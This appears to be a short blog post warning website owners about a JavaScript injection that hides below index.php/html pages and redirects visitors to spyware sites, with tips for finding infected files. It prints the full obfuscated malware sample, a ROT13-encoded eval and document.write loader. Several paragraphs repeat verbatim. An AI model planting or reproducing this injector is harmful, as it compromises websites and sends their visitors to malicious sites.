Annoyed by injection in your web site pages, then you’d look for following solution on it. Here is one of the javascript codes of an “injection” that inserts itself into the default page of a website. It is planned to go hidden by only redirecting arbitrarily.
Generally this code is inserted at the bottom of the source code of index or default page, with a considerable white space after the end of the normal source code. It redirects to a “spyware” or “virus” site. Even it is also not detected by antivirus programs.
It infects each and every .php file and does not re-infect after the initial infection. Generally it injects the code into .php (and .html) files about 115 lines below the end line of the normal code. It ONLY infects index.php/html files in the httpdocs directory of the website.
If you rename your file to some other name such as index2.php – it’ll not be infected. The “modified date” time stamps also change with the infection. Once you get the time stamp when it infected, search for files modified at that time.
Generally this code is inserted at the bottom of the source code of index or default page, with a considerable white space after the end of the normal source code. It redirects to a “spyware” or “virus” site. Even it is also not detected by antivirus programs.
It infects each and every .php file and does not re-infect after the initial infection. Generally it injects the code into .php (and .html) files about 115 lines below the end line of the normal code. It ONLY infects index.php/html files in the httpdocs directory of the website.
If you rename your file to some other name such as index2.php – it’ll not be infected. The “modified date” time stamps also change with the infection. Once you get the time stamp when it infected, search for files modified at that time.
var mf=” shapgvba ejtf(c){ine ro,con=\”HcvfNU)z\\\”n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\”,olq=\”\”,i,nnu,l=\”\”,n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}”,rmhc=“”;for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km=“<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\”G]$K;Ms$G’Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\”G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U”; rwgs(km);
No comments:
Post a Comment